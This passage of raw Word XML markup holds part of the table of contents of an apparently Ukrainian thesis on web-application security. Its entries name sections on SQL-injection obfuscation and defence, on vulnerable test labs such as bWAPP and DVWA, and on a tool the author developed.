              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433141" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">2.8.4 </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Obfuscated Code</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_Toc30433141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60</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="71DDE3FC" w14:textId="7DD7B1DF" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433142" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">2.8.5 </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Hex encoding</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_Toc30433142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60</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="688022EB" w14:textId="3AA1F005" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433143" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">2.8.5 </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Manipulating White Space</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_Toc30433143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61</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="16C892A0" w14:textId="024AC4EC" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433144" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">2.9 Захист від </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>ін’єкцій</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_Toc30433144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61</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27ADC444" w14:textId="530B16F2" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433145" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">2.9.1 Чому веб додатки вразливі до </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve"> ін’єкцій.</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_Toc30433145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62</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="504F2AC3" w14:textId="64ED304A" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433146" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">2.9.2 Кроки, які допоможуть захиститися від </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>-ін’єкцій.</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_Toc30433146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62</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08284E50" w14:textId="4489205A" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433147" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>2.10 Висновки по розділу</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_Toc30433147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64</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D5113E1" w14:textId="4DFB5196" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="12"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433148" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>РОЗДІЛ 3</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_Toc30433148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66</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A7456C8" w14:textId="665244AB" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="12"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433149" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>ЕТАПИ РОБОТИ РОЗРОБЛЕНОГО ІНСТРУМЕНТУ</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_Toc30433149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66</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5C3231C3" w14:textId="2BC64156" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433150" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>3.1 Описання інструменту</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_Toc30433150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66</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0CABF077" w14:textId="701CD63A" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433151" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>3.2 Розгортання лабораторій для тестування</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_Toc30433151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68</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3B34CAEA" w14:textId="5A930584" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433152" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">3.2.1 Описання </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>bee-box bwapp</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_Toc30433152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69</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="735949FF" w14:textId="653DAFD5" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433153" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">3.2.2 Описання </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Damn Vulnerable Web Application</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve"> (DVWA)</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_Toc30433153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70</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4378B76B" w14:textId="79DB1CD7" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433154" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>3.2.</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">3 </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">Описання </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>VMware Workstation Pro</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_Toc30433154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71</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09216069" w14:textId="66CB90F3" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433155" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>3.2.4 Описання</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ubuntu</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_Toc30433155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72</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="607C5C22" w14:textId="74091557" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433156" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">3.2.5 Описання </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Windows 10</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_Toc30433156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73</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1DE762D7" w14:textId="0CF8EDC9" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433157" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">3.2.5 Описання </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>WampServer</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_Toc30433157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74</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="50C78774" w14:textId="4149972D" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433158" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>3.3 Використання розробленого інструменту</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_Toc30433158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75</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="11A45392" w14:textId="2B9E90B5" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433159" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>3.3.1 Описання першої вкладки програми</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_Toc30433159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77</w:t>
            </w:r>
